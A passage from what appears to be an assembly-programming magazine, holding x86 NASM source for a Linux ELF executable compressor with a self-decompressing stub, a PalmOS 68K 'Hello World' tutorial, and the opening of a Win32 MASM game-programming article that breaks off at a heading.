byte first ( before chain ; without change delta ) call bitreq_02 pop eax add dword [esp+0*4],edx pop edx xchg ecx,eax ; restore EAX = number of bytes of ; non-optimized chain inc ecx inc ecx ; number of bytes for pack optimized chain cmp eax,ecx pop ecx ; number of bits for pack non-optimized chain jc near pack_1_byte_look_better cmp edx,ecx jc near pack_1_byte_look_better try_old_optimalization: push esi add esi,eax cmp dword [konyc_dat],esi pop esi jz near L_NO_0 call bitreq_02 push ebx push eax push edx push eax push esi add esi,eax call scan002 call bitreq_02 pop esi add dword [esp+0*4],eax add dword [esp+1*4],edx xor eax,eax call bitreq_02 push edx inc esi call scan002 call bitreq_02 dec esi add dword [esp+0*4],edx pop edx ; EDX=bits required by pack 1 byte first inc eax ; EAX=bytes packed in 2 steps , pack 1 byte ; first cmp dword [esp+0*4],eax jc obnov_to ;;; clc jnz obnov_to cmp edx,dword [esp+1*4] obnov_to: pop eax pop edx pop eax pop ebx jc near pack_1_byte_look_better A08_new_optimalization: cmp eax,3 jc near can_t_use_new_optimalization_08 push esi add esi,eax inc esi inc esi inc esi ; it's very unhappy idea fucking near the death ; this isn't usefull for try code marked ; DANGEROUS for last 3 bytes because this can ; be unstable (data in f0b overleap) cmp dword [konyc_dat],esi pop esi jbe this_is_it xchg dword [last_delta],ebx push ebx push eax push esi add esi,eax inc esi ; DANGEROUS , ESI+1 call scan002 call scanincd ; DANGEROUS , must be ESI + 1 + EAX (where ; EAX > 1) pop esi ; DEC instruction don't change Carry (=CF) !!! pop eax ; POP instruction don't change Carry (=CF) !!! pop ebx xchg dword [last_delta],ebx ; XCHG instruction don't change Carry ; (=CF) !!! jnc can_t_use_new_optimalization_08 this_is_it: push ebx push eax push edx ;db 6Ah,0 ; push dword 0 ; bits count=0 but will ; be overwrited first time because ; chain > 0 bytes will be found db 6Ah,0 ; push dword 0 ; chain lenght counter new_optimalization_08_L0: call scan_lim ; scan EAX chain lenght, return min. ; EBX call scanincd jc new_optimalization_08_L1 mov ebx,dword [last_delta] new_optimalization_08_L1: call bitreq_02 push edx push eax push esi xchg dword [last_delta],ebx push ebx add esi,eax call scan002 call bitreq_02 pop ebx xchg dword [last_delta],ebx pop esi add eax,dword [esp+0*4] xchg ecx,eax pop eax add dword [esp+0*4],edx pop edx cmp dword [esp+0*4],ecx jc toto_bude_asy_lepseeeee jnz toto_bude_asy_horse cmp dword [esp+1*4],edx jbe toto_bude_asy_horse toto_bude_asy_lepseeeee: ; mov dword [esp+2*4],ax ; mov dword [esp+3*4],bx ; mov dword [esp+0*4],cx ; mov dword [esp+1*4],dx add esp, byte 4*4 push ebx push eax push edx push ecx toto_bude_asy_horse: dec eax cmp eax,1 jnz new_optimalization_08_L0 pop eax pop eax pop eax pop ebx can_t_use_new_optimalization_08: L_NO_0: cmp eax,9 ; under 32 bit opcodes it's enough for 1 MB ; data block ; 16 bit delta is less than 64 kB and require ; max. 4 bytes for calculate it ; Summa: Under DOS its enough use CMP AX,4 ; because small value is fast algorithm ; Under 32 bit OS ( Linux, NT 4.0 ) use ; big value if big data block ; 9 is enough for 4 GB of data block ; Who can produce 4 GB of ASM code ??? jnc cant_optimize_002_L0 ; i have chain with AX <2,0Fh> and try pack 1 byte AX times push eax db 6Ah,0 ;push 0000h ; bits require counter push eax ; pack 1 byte AX times optimize_002_L2: xor eax,eax call bitreq_02 ; include procedure in bitreq02.inc inc esi add dword [esp+1*4],edx ; bits require counter dec dword [esp+0*4] ; pack 1 byte EAX times jnz optimize_002_L2 ; simulate pack 1 byte EAX times pop eax ; remove word from stack only pop ecx ; ECX = required bits count for pack 1 byte EAX ; times pop eax ; restore EAX sub esi,eax ; restore ESI call bitreq_02 ; explore once-pack EAX bytes EBX delta bits ; count ; return EDX=bits required cmp edx,ecx jc cant_optimize_002_L0 ; use JC for prefer pack 1 byte EAX times ; use JBE for prefer once-pack EAX bytes with delta = EBX ; JC is sometimes better because pack 1 byte don't change delta and it's ; possibility pack without change delta ( call scanincd ) later ; JC has better ratio in my experiments by aprox 1 byte per 1 kB of data but ; this depend on data structure and sometimes JBE can be more rational if ; change delta and later pack with this new delta without change delta ; O.K. pack 1 byte now pack_1_byte_look_better: xor eax,eax ; now will be packed last 1 byte by call pack002 in a00.asm ; EAX=0 cant_optimize_002_L0: call pack002 add esi,eax sub dword [f0s],eax pushfd call progress popfd jnz near compress002 ; jnz don't handle error if packing ; more bytes as bytes in f0buffer ; jnbe is better mov ecx,progress_text xor edx,edx inc edx mov byte [ecx],0Ah call WS terminate002: call putbit1 call putbit1 xor eax,eax stosb mov ebx,dword [position] stc rcl byte [ebx],1 jc done_002 flush: shl byte [ebx],1 jnc flush ; shift all control_bits and remove ; highest ( highest was put in MOV BYTE ; PTR DS:[DI],1 , INC DI ) done_002: after_compress: ; modifying data for fill pointer registers in output file ; calculate boundary of moved data mov ecx,f1b mov eax,edi sub eax,f1b - 08048000h + 1 mov dword [ecx+4Fh],eax ; esi value mov eax,edi sub eax,f1b+4Ch+fuyi - 08048000h + 1 add eax,dword [ecx+40h] mov dword [ecx+54h],eax ; edi value ; calculate size of moved data mov eax,edi sub eax,f1b+4Ch+fuyi mov dword [ecx+59h],eax ; ecx value ; calculate offset after uncompress_routine (esi) mov eax,dword [ecx+40h] add eax,08048000h + uncompress_routine_end - uncompress_moved mov dword [ecx+69h],eax ; esi value ; calculate offset of moved U13 (ebp) sub eax, byte (uncompress_routine_end - U13) mov dword [ecx+6Eh],eax ; ebp value ; calculate JUMP mov eax,dword [ecx+18h] sub eax,dword [ecx+40h] sub eax,08048000h + uncompress_routine_end - uncompress_moved mov dword [f1b+0D9h],eax ;[ecx+0D9h],eax ; modify data in a header mov dword [ecx+18h],0804804Ch ; START mov eax,edi ; ECX=f1b sub eax,ecx ; sub eax,f1b mov dword [ecx+3Ch],eax ; filesize sub eax, byte ( fuyi + 4Ch + 1 ) add dword [ecx+40h],eax ; memorysize mov byte [ecx+44h],111b ; Exec,Write,Read ; O.K. going write output... mov ebx,dword [f1h] ; ECX=f1b ;;; mov ecx,f1b mov edx,edi sub edx,ecx ; xor eax,eax ; mov al,4 ; sys_write db 6Ah,4 ; push dword 4 pop eax int 80h cmp eax,edx jz OK_write mov ecx,MEWF ; xor edx,edx ; mov dl,MEWFS db 6Ah,MEWFS ; push dword MEWFS pop edx call WS ex05: jmp short exit OK_write: mov esi,f0h lodsd xchg ebx,eax ; xor eax,eax ; mov al,6 ; sys_close db 6Ah,6 ; push dword 6 pop eax int 80h lodsd xchg ebx,eax ; xor eax,eax ; mov al,6 ; sys_close db 6Ah,6 ; push dword 6 pop eax int 80h exit: xor ebx,ebx ; xor eax,eax ; inc eax db 6Ah,1 pop eax ; this is better for compress as xor eax,eax inc eax ; sys_exit int 80h WS: xor ebx,ebx inc ebx ; EBX=1 (STDOUT) ; xor eax,eax ; mov al,4 ; write db 6Ah,4 ; push dword 4 pop eax int 80h ret ; ------- scan002: ; input: chain on ESI ; return: EAX max. lenght ( 0 or 1 for chain not found ) , EBX delta push esi push edi xor edx,edx ; chain lenght counter mov edi,f0b mov ecx,esi sub ecx,edi lodsb scan_L00: jecxz scan_L04 repnz scasb jnz scan_L04 push eax push ecx push esi push edi mov eax,dword [konyc_dat] sub eax,esi mov ecx,eax jecxz scan_L03 scan_L01: repz cmpsb jnz scan_L02 inc eax ; last byte is in chain and must be encountered scan_L02: sub eax,ecx cmp eax,1 ; chain must be minimal 2 bytes long jbe scan_L03 cmp eax,edx jc scan_L03 xchg edx,eax mov ebx,esi sub ebx,edi ; EBX=shift=deta scan_L03: pop edi pop esi pop ecx pop eax jmp short scan_L00 scan_L04: pop edi pop esi xchg edx,eax ret ; ------- scan_ncd: ; input: chain on ESI , EAX requested lenght with shift = [last_delta] ; return: EAX max. lenght ( 0 or 1 for chain not found ) cmp dword [last_delta], byte 0 jnz mozno_aj_bude xor eax,eax ret mozno_aj_bude: push ecx push esi push edi mov edi,esi sub edi,dword [last_delta] mov ecx,eax repz cmpsb pop edi pop esi jnz scan_ncd_0 inc eax ; last byte is in chain and must be encountered scan_ncd_0: sub eax,ecx pop ecx ret scanincd: ; input: chain on ESI , EAX requested lenght with shift = [last_delta] ; return: CLC ( Carry Flag = 0 ) if chain found , STC (CF=1) if not found cmp dword [last_delta], byte 0 jnz mozno_aj_bude_0 stc ret mozno_aj_bude_0: push ecx push esi push edi mov edi,esi sub edi,dword [last_delta] mov ecx,eax repz cmpsb pop edi pop esi jnz nebude_any_ket_sa_zesere_z_blbych_pocytov jecxz zeserau_sa_z_blbych_pocytov nebude_any_ket_sa_zesere_z_blbych_pocytov: stc pop ecx ret zeserau_sa_z_blbych_pocytov: clc pop ecx ret ; ------- scan_lim: ; input: chain on ESI , EAX chain lenght , EAX > 1 ; return: EBX minimal delta ; this procedure is usefull for call after call scan002 for scan shorter chains ; on this some ESI ; call scan_lim assume that on ESI is chain with {EAX} <3,max_register_limit> ; call scan_lim with EAX = {EAX}-1, {EAX}-2, {EAX}-3, ... , 3, 2 ; {EAX} is value returned after call scan002 push ecx push edi mov edi,esi scan_lim_L00: dec edi ; cmp edi,f0b ; call scan_lim assume that longer chain was ; ; found ; jc scan_lim_L00 mov ecx,eax push esi push edi repz cmpsb pop edi pop esi jnz scan_lim_L00 jecxz scan_lim_L01 jmp short scan_lim_L00 scan_lim_L01: mov ebx,esi sub ebx,edi pop edi pop ecx ret ; ------- bitreq_02: ; input : EAX = number of bytes for pack request ; EBX = shift = delta ( if EAX = 2 or more ) ; output : EDX = number of bits required for pack ; destroy: nothing cmp eax,1 jnbe bitreq_more_bytes bitreq_1_byte: db 6Ah,7 ; push doubleword 7 pop edx ; make EDX=7 ; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16 ; if this can't be used , pack by use 9 bits can be always used ; byte for compress is = 00h ? cmp byte [esi],0 jz bitreq_7_bits ; 7 bits required ( sequence 1100000 ) bitreq_jak_skusas_co_skusas: ; byte isn't = 00h but explore if found equal byte with shift < 16 push eax mov al,byte [esi] push ecx ; xor ecx,ecx ; mov cl,15 db 6Ah,15 pop ecx push edi mov edi,esi sub edi,ecx cmp edi,f0b jnc bitreq_pome_skusat mov edi,f0b mov ecx,esi sub ecx,edi bitreq_pome_skusat: repnz scasb pop edi pop ecx pop eax jz bitreq_7_bits ; always can be used this mode but has bad pack ratio ; pack 1 byte , use 9 bits ( 1 byte + 1 bit ) mov dl,9 bitreq_7_bits: mov al,1 ; 1 byte packed EAX=1 ret bitreq_more_bytes: cmp ebx,dword [last_delta] jnz bitreq_another_delta bitreq_old_delta: bsr edx,eax ; ( bits / 2 ) for calculate bytes count lea edx,[2*edx+4] ; 4 bits sequence 1000 don't calculate new ; delta ret bitreq_another_delta: cmp ebx,byte 7Fh ; cmp ebx,7Fh require 3 ; bytes jnbe bitreq_big_delta_or_more_bytes cmp eax,4 jnc bitreq_big_delta_or_more_bytes ; pack 2 or 3 bytes with delta <+0001h,+007Fh> db 6Ah,8+3 pop edx ;mov edx,8+3 ; 8 bit = 1 byte for ; MOV BL,[ESI] INC ESI ret ; 3 bit sequence 111 switch to this ; mode bitreq_big_delta_or_more_bytes: ; pack 4 or more bytes with delta <+0001h,maximal_delta) ; pack 2 or more bytes with delta <+0080h,maximal_delta) push eax push ebx cmp ebx,byte 7Fh jnbe bitreq_high_delta dec eax dec eax ; invert for 2x INC ECX in decompress bitreq_high_delta: bsr eax,eax ; (bits/2) for calculate count shr ebx,8 ; remove BL part of delta inc ebx inc ebx inc ebx ; invert for 3x DEC EBX in decompress bsr ebx,ebx ; (bits/2) for calculate delta without BL add eax,ebx lea edx,[2*eax+2+8] ; 2 bit sequence for switch to this mode ; 8 bit=1 byte for MOV BL,[ESI] INC ESI pop ebx pop eax ret ; ------- pack002: ; input : EAX = number of bytes for pack request ; EBX = shift = delta ( if AX = 2 or more ) ; output : EAX = number of bytes packed cmp eax,1 jnbe pack_more_bytes pack_1_byte: ; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16 ; if this can't be used , pack by use 9 bits can be always used ; byte for compress is = 00h ? mov al,byte [esi] or al,al jz common_7_bits ; putbit sequence 1100000 jak_skusas_co_skusas: ; byte isn't = 00h but explore if found equal byte with shift < 16 xor ecx,ecx mov cl,15 push edi mov edi,esi sub edi,ecx cmp edi,f0b jnc pome_skusat mov edi,f0b mov ecx,esi sub ecx,edi pome_skusat: repnz scasb pop edi jnz jerk_it_off_and_try_again xchg ecx,eax inc eax ; EAX = shift (possitive value) common_7_bits: call putbit1 call putbit1 call putbit0 mov cl,4 shl al,cl pbimu7: shl al,1 call putbit loop pbimu7 jmp short pack_1_byte_common_end jerk_it_off_and_try_again: ; always can be used this mode but has bad pack ratio ; pack 1 byte , use 9 bits ( 1 byte + 1 bit ) movsb dec esi ; restore ESI to ESI before pack call putbit0 pack_1_byte_common_end: xor eax,eax inc eax ; 1 byte packed EAX=1 ret pack_more_bytes: push eax ; store EAX for restore number of bytes packed ; ( by POP EAX ) cmp ebx,dword [last_delta] jnz another_delta pack_with_old_delta: call putbit1 call putbit0 call putbit0 call putbit0 ; sequence 1000 don't calculate new delta mov ecx,32 fdcd: dec ecx shl eax,1 jnc fdcd ; shift bits left and remove highest bit=1 ; this bit will be put by INC CX in decompress mocd: shl eax,1 call putbit dec ecx jz mwocd call putbit1 jmp short mocd mwocd: call putbit0 pop eax ; packed EAX bytes from input buffer ret another_delta: mov dword [last_delta],ebx ; all modes change last_delta ; cmp ebx,80h ; cmp ebx,80h require 6 bytes ; jnc big_delta_or_more_bytes db 83h,0FBh,7Fh ;cmp ebx,7Fh ; cmp bx,7Fh require 3 bytes jnbe big_delta_or_more_bytes cmp eax,4 jnc big_delta_or_more_bytes ; pack 2 or 3 bytes with delta <+0001h,+007Fh> call putbit1 call putbit1 ; bit sequence 111 switch to this mode ; third bit 1 will be passed at end of ; packing before POP AX sub al,3 ; value 2 -> CF=1, value 3 -> CF=0 adc bl,bl xchg ebx,eax stosb call putbit1 ; put last control bit must be after ; STOSB (for mov bl,[esi] , inc esi) ; because when decompress , bits are ; processed first and byte second -> ; when compressing , byte must be ; processed before last bit pop eax ; value 2 or 3 ; -> this mode process 2 or 3 bytes ret big_delta_or_more_bytes: ; pack 4 or more bytes with delta <+0001h,maximal_delta) ; pack 2 or more bytes with delta <+0080h,maximal_delta) call putbit1 call putbit0 db 83h,0FBh,7Fh ;cmp ebx,7Fh jnbe high_delta dec eax dec eax ; invert for 2x INC ECX in decompress high_delta: push eax xchg ebx,eax push eax ; push only for part in BL moved to AL shr eax,8 ; this destroy AL inc eax inc eax inc eax ; invert for 3x DEC EBX mov ecx,32 fgfaad: dec ecx shl eax,1 jnc fgfaad wetryw: shl eax,1 call putbit dec ecx jz shsdwd call putbit1 jmp short wetryw shsdwd: call putbit0 pop ebx ; pop only for BL pop eax ; pop bytes count calculate_count: mov ecx,32 fcdcd: dec ecx shl eax,1 jnc fcdcd ; shift all bits left and remove highest bit=1 ; this bit will be put by INC ECX in decompress mwocdl: shl eax,1 call putbit dec ecx jz mwocdt call putbit1 jmp short mwocdl mwocdt: xchg ebx,eax stosb ; store AL (BL in decompress) ; as well in delta <+0001h,+007Fh> , stored ; byte must be before store last bit because ; when decompress, bit will be processed ; first and byte will be loaded later call putbit0 ; this bit will be processed in ; decompress for calculate ECX ( JC U05 ) pop eax ; packed EAX bytes from input buffer ret ; ------- ; putbit input : Carry Flag (CF=0,CF=1) ; output : bit 0. in [position], EDI+1 as need for store bit to [EDI] ; destroy: nothing putbit0:clc ; put bit=0 jmp short putbit putbit1:stc ; put bit=1 putbit: push ebx mov ebx,dword [position] rcl byte [ebx],1 pop ebx jnc o_C_1 o_C_0: mov byte [edi],1 mov dword [position],edi inc edi o_C_1: ret ; ------- progress: pushad mov esi,f0s_2 mov edi,progress_text+1 mov ebp,w1hch lodsd push eax sub eax,dword [esi] rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp inc edi inc edi pop eax rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp rol eax,4 call ebp mov ecx,progress_text xor edx,edx mov dl,progress_text_size call WS popad ret w1hch: push eax and al,00001111b cmp al,10 sbb al,69h das stosb pop eax ret ; ------- uncompress_routine: pushfd pushad mov esi,0 mov edi,0 mov ecx,0 std repz movsb cld xchg esi,edi inc esi db 83h,0EFh,fuyi - 1 ; sub edi,fuyi-1 push esi mov esi,0 mov ebp,0 ; U13 mov dl,80h ret fuyi equ $ - uncompress_routine uncompress_moved: push eax U00: movsb U01: call ebp jnc U00 xor ebx,ebx call ebp inc ecx jnc U03 call ebp jc U06 mov bl,10h U02: call ebp adc bl,bl jnc U02 jnz U10 xchg ebx,eax jmp short U12 U03: inc ebx U04: call ebp adc ebx,ebx call ebp jc U04 U05: call ebp adc ecx,ecx call ebp jc short U05 dec ebx dec ebx jz short U09 dec ebx shl ebx,8 ;;;;;;; clc ; clc isn't needed because EBX < 01000000h before shift U06: mov bl,byte [esi] inc esi jnc U07 shr bl,1 jz U15 sbb cl,ch ; equ SBB CL,BH because BH=CH=0 U07: ;cmp ebx,00007D00h ; this is not implemented, yet ;jnc zvys_o_dve ; i found this in WINCMD32.EXE v. 4.03 ;cmp ebx,00000500h ; packed with ASPACK ;jnc zvys_o_jennu ; isn't rational compress 3 bytes with shift > 7CFFh ; rational is at least 4 bytes ; isn't rational compress 2 bytes with shift > 4FFh ; rational is at least 3 bytes cmp ebx, byte 7Fh ;db 83h,0FBh,7Fh jnbe U08 zvys_o_dve: inc ecx zvys_o_jennu: inc ecx U08: pop eax db 0A8h ; opcodes A8 5B = TEST AL,5B U09: pop ebx ; opcode 5B push ebx U10: neg ebx U11: mov al,byte [edi+ebx] U12: stosb loop U11 jmp short U01 U13: add dl,dl ; get highest bit from control_byte jnz U14 ; is it last non-zero bit ? = all 8 bits was processed ? lodsb ; load control_byte xchg edx,eax ; store control_byte to DL adc dl,dl ; put last bit from last control_byte to bit 0. ; of new control_byte U14: ret U15: pop eax popad popfd db 0E9h ; jump dd 0 uncompress_routine_end: uncompress_routine_size equ $ - uncompress_routine ; ------- MEOF db 'ERROR OPEN file!',0Ah MEOFS equ $ - MEOF MECF db 'ERROR CREAT file!',0Ah MECFS equ $ - MECF MSEEF db 'ERROR SEEK to END of file!',0Ah MSEEFS equ $ - MSEEF MSEBF db 'ERROR SEEK to BEGIN of file!',0Ah MSEBFS equ $ - MSEBF MERF db 'ERROR READ file!',0Ah MERFS equ $ - MERF MEWF db 'ERROR WRITE file!',0Ah MEWFS equ $ - MEWF usage db 0Ah,'K0mprezz ELF ASM executab1e fy1e usyng OOO alg0ry' db 'thm',0Ah db 0Ah,'usage: a00 ' db 'filename_for_compress compressed_filename',0Ah,0Ah db 'ASM coding in LINUX by Feryno',0Ah db 'Feryno: ASSEMBLER-only and DISASSEMBLER-only wonderfu' db 'l' db 0Ah,0Ah usagesize equ $ - usage progress_text db 0Dh,'00000000h/00000000h' progress_text_size equ $ - progress_text ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; filesize equ $ - $$ ;; ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; SECTION .bss ALIGNB 4 f0h resd 1 ; in_file handle f1h resd 1 ; out_file handle f0s_2 resd 1 ; in_file size f0s resd 1 ; in_file size position resd 1 ; required by putbit procedures konyc_dat resd 1 last_delta resd 1 fy1eObuffer resb 4Ch ; header of a file f0b resb 100000h ; kode & data of a fy1e f0b_size equ $ - fy1eObuffer f1b_size equ 200000h f1b resb f1b_size ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; bsssize equ $ - $$ ;; ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; memsize equ filesize+bsssize ;; ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::........................................PALMOS.ENVIRONMENT Hello Tiny World by Latigo Hola! This is a tutorial on assembler for the PalmOS enviroment. I decided to write them due to the lack of material on the web. To assemble the asm presented in this paper, you need to get Darrin Massena's ASDK; which can be downloaded from http://www.massena.com/darrin/pilot/index.html. The ASDK contains an assembler,disassembler, the palm emulator and many other great tools. Massena is the low-level-semi-god-techno-guru who created the assembler (Pila), along with many other tools and documents. He was my starting point (and for many others too) for asm coding in the Palm enviroment. The Palm uses a variation of the 68K Motorola CPU called 'DragonBall' which has 8 32-bit Data registers (from D0 to D7), 8 Addres registers (from A0 to A7) being A7 the stack pointer,one PC register which is the 'Program Counter' which contains the address of the instruction to be executed next and one 16 bits register called the Status Register (SR). Another thing to be noted is the way operands are specified in the DragonBall enviroment. It's not 'DEST,SRC' as in the Wintel world we all know, but 'SRC,DEST'. Say if you wanted to copy all the contents of the D7 register to the D0 this should be done: 'MOVE.L D7,D0'. One last very important thing too is how to specify data types. In the previous example i used 'MOVE.L' where '.L' is talking about a 'long' data type. I could have used '.b' or '.w' meaning byte and word respectively. The size is always appended, when suitable, to the instruction nmemonic. So what im gonna show you here is something pretty basic, but will be enough as a start. It's the typicall 'Hello World'. Theory: ------- We will create a basic Palm program in assembly which will make use of the FrmAlert Systrap in order to display an Alert Resource. Word FrmAlert ( Word alertId ); As you can see this Systrap (the word Systrap can be taken as a sinonym of the word 'API') takes one parameter. An Alert resource. There are many resource types (String,Form,version,etc) but we only care for the 'Alert' type. All this means that we must create a resource file (.rcp) which includes our Alert and the Asm file (.asm) which contains the code to display the Alert resource. All this said, lets do some 'Hello tiny world' :) The resource file (Hello.rcp): ------------------------------ ; Here we are going to declare our resources. In this case only an Alert ; resource is going to be create since that's all we need ALERT ID 1000 ; This is the ID of our Alert. INFORMATION ; This is the TYPE of the Alert. It could be [INFORMATION] ; or [CONFIRMATION] or [WARNING] or [ERROR] BEGIN ; Beginning of the Alert resource. Let's define all it's properties. TITLE "Hello tiny World!" ; This would be the title of the Alert MESSAGE "This is just the beginning!" ; Yes, you guessed. Its the Message BUTTONS "Ciao :)" ; In this case we have only one button END ; END of the Alert resource The asm file (Hello.asm): ------------------------- Appl "MBox", 'Lat1' ; This sets the program's name and Id. The name is the one that will show up in ; the installed program's list. The ID is that,an ID :) include "Pilot.inc" ; Just like windows.inc, full of constants, structure offsets,API trap codes, ; etc. include "Startup.inc" ; Startup.inc contains a standard startup function which must be the first ; within an application and is called by the PalmOS after the app is loaded. ; SysAppStartup is first executed, if it doesn't fail, then PilotMain in our ; app is called and after it returns, SysAppExit is called. In short, don't ; remove this :) MyAlert equ 1000 ; Some Constants code proc PilotMain(cmd.w, cmdPBP.l, launchFlags.w) ; Just like WinMain; PilotMain's prototype is in Pilot.inc. ; It takes three parameters, a WORD (cmd), a LONG (cmdPBP) and another WORD ; (launchFlags) ; Whenever parameters are passed to API calls, their size has to specified too. ; So '.b' for a byte,'.w' for a word and '.l' for a Long. ; Remember that PilotMain is called from StartUp.inc!! beginproc ; Marks the beginning of a procedure by reserving the needed space in the stack ; for local variables if any. To do this it performs the link a6,#nnnn where ; #nnnn is the number of bytes. TST.W cmd(a6) ; PilotMain function is called many times in different circumstances so here we ; check that the cmd parameter is 0 (sysAppLaunchCmdNormalLaunch is 0?) which ; would mean a 'normal' program launching. ; TST.W cmd(a6) means 'CMP WORD PTR cmd,0' in the Intel enviroment .W implies ; that only 2 bytes out of the cmd variable will be TeSTed cmd(a6) tells pila ; that the cmd variable is a LOCAL variable. Would it have been cmd(a5), then ; the assembler would know that cmd is a GLOBAL variable. BNE PmReturn ; BNE = Branch Not Equal. Just like the beloved JNZ systrap FrmAlert(#MyAlert.w) ; MessageBox! :) systrap is the keyword to invoke APIs, it PUSHes the specified ; parameters and cleans the stack after the API execution. ; # means that MyAlert is specifying a CONSTANT NUMBER and .w means that ; MyAlert is making reference to a WORD ; ; systrap FrmAlert(#MyAlert.w) would be the same as: ; move.w #MyAlert,-(a7) = push alert id on stack and decrement it ; trap #15 = PalmOS API call ; dc.w sysTrapFrmAlert = invoke the alert dialog! by declaring the ; word that is equivalent to 'sysTrapFrmAlert' ; addq.l #2,a7 = correct stack PmReturn ; Just a Label endproc ; Sefin�, endproc executes the unlk and rts instructions ;-----------------------Resources------------------------------ ; Here we must 'tell' pila all those resources that we created so it will ; include them to our assembled code. ; We now declare ALL the resources being used by Hello.asm, the keyword 'res' ; is first placed; followed by the TYPE of the resource. ;-=Alert Resources=- res 'Talt', MyAlert, "Talt03e8.bin" ; This resource defines launch flags, stack and heap size :) res 'pref', 1 dc.w sysAppLaunchFlagNewStack|sysAppLaunchFlagNewGlobals|sysAppLaunc hFlagUIApp|sysAppLaunchFlagSubCall dc.l $1000 ; stack size dc.l $1000 ; heap size ;------------------------------ end -------------------------------------------- That's all my friends! to assemble and link this program execute the following: pilrc Hello.rcp pila Hello.asm Pilrc being the resource compiler and pila the assembler of course. Well, that's it! easy huh? Next time i'll complicate things a little bit including a Form :) Should your Palm Asm hunger be unstoppable, you could check my site for more coding and reversing stuff: www.latigo.cjb.net. Take Care! Bye! Latigo ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::.............................................GAMING.CORNER Win32 ASM Game Programming - Part 2 by Chris Hobbs [This series of articles was first posted at GameDev.net and is now being published here with the author's permission. Here is Chris Hobbs' introduction on this particular article: "A continuation of the development of SPACE-TRIS. This one covers the coding of WinMain, a Direct Draw library, and a Bitmap library." Visit his website at http://www.fastsoftware.com. Preface, Html-to-Txt conversion and formating by Chili] Where Did We Leave Off? ----------------------- The last article discussed many basics of Win32 ASM programming, introduced you to the game we will be creating, and guided you through the design process. Now it is time to take it a few steps further. First, I will cover, in depth, the High Level constructs of MASM that make it extremely readable ( at generally no performance cost ), and make it as easy to write as C expressions. Then, once we have a solid foundation in our assembler we will take a look at the Game Loop and the main Windows procedures in the code. With that out of the way we will take a peek at Direct Draw and the calls associated with it. Once, we understand how DirectX works we can build our Direct Draw library. After that we will build our bitmap file library. Finally, we will put it all together in a program that displays our Loading Game screen and exits when you hit the escape key. It is a pretty tall order but I am pretty sure we can cover all of the topics in this article. Remember: If you want to compile the code you need the MASM32 [http://www.pbq.com.au/home/hutch/] package, or at the very least a copy of MASM 6.11+. If you are already familiar with MASM's HL syntax then I would suggest skipping the next section. However, those of you who are rusty, or have never even heard of it, head on to the next section. There you will learn more than you will probably ever need to know about this totally cool addition to our assembler. MASM's HL Syntax ---------------- I am sure many of you have seen an old DOS assembly language listing. Take a moment to recall that listing, and picture the code. Scary? Well, 9 times out of 10 it was scary. Most ASM programmers wrote very unreadable code, simply because that was the nature of their assembler. It was littered with labels and jmp's, and all sorts of other mysterious things. Try stepping through it with your mental computer. Did you crash? Yeah, don't feel bad. It is just how it is. Now, that was the 9 out of 10 ... what about that 1 out of 10? What is the deal with them? Well, those are the programmers who coded MACRO's to facilitate High Level constructs in their programs. For once, Microsoft did something incredibly useful with MASM 6.0 ... they built those HL MACRO's, that smart programmers had devised, into MASM as pseudo-ops. If you aren't aware of what this means I will let you in on it. MASM's assembly code is now just as readable and easy to write as C. This, of course, is just my opinion. But, it is an opinion shared by thousands and thousands of ASM coders. So, now that I have touted its usefulness let's take a look at some C constructs and their MASM counterparts. IF - ELSE IF - ELSE The C version: The MASM version: if ( var1 == var2 ) .if ( var1 == var2 ) { ; Code goes here // Code goes here .elseif ( var1 == var3 ) } ; Code goes here else .else if ( var1 == var3 ) ; Code goes here { .endif // Code goes here } else { // Code goes here } DO - WHILE The C version: The MASM version: do .repeat { ; Code goes here // Code goes here .until ( var1 != var2 ) } while ( var1 == var2 ); WHILE The C version: The MASM version: while ( var1 == var2 ) .while ( var1 == var2 ) { ; Code goes here // Code goes here .endw } Those are the constructs that we can use in our code. As you can see they are extremely simple and allow for nice readable code. Something assembly language has long been without. There is no performance loss for using these constructs, at least I haven't found any. They typically generate the same jmp and cmp code that a programmer would if he were writing it with labels and such. So, feel free to use them in your code as you see fit ... they are a great asset. There is one other thing we should discuss and that is the psuedo-ops that allow us to define procedures/functions easily. PROTO and PROC. Using them is really simple. To begin with, just as in C you need to have a prototype. In MASM this is done with the PROTO keyword. Here are some examples of declaring protoypes for your procedures: ;================================== ; Main Program Procedures ;================================== WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD The above code tells the assembler it should expect a procedure by the name of WinMain and one by the name of WndProc. Each of these has a parameter list associated with them. They both happen to expect 4 DWORD values to be passed to them. For those of you using the MASM32 package, you already have all of the Windows API functions prototyped, you just need to include the appropriate include file. But, you need to make sure that any user defined procedure is prototyped in the above fashion. Once we have the function prototyped we can create it. We do this with the PROC keyword. Here is an example: ;######################################################################## ; WinMain Function ;######################################################################## WinMain PROC hInstance :DWORD, hPrevInst :DWORD, CmdLine :DWORD, CmdShow :DWORD ;=========================== ; We are through ;=========================== return msg.wParam WinMain endp ;######################################################################## ; End of WinMain Procedure ;######################################################################## By writing our functions in this manner we can access all passed parameters by the name we give to them. The above function is WinMain w/o any code in it. You will see the code in a minute. For now though, pay attention to how we setup the procedure. Also notice how it allows us to create much cleaner looking code, just like the rest of the high level constructs in MASM do also. Getting A Game Loop Running --------------------------- 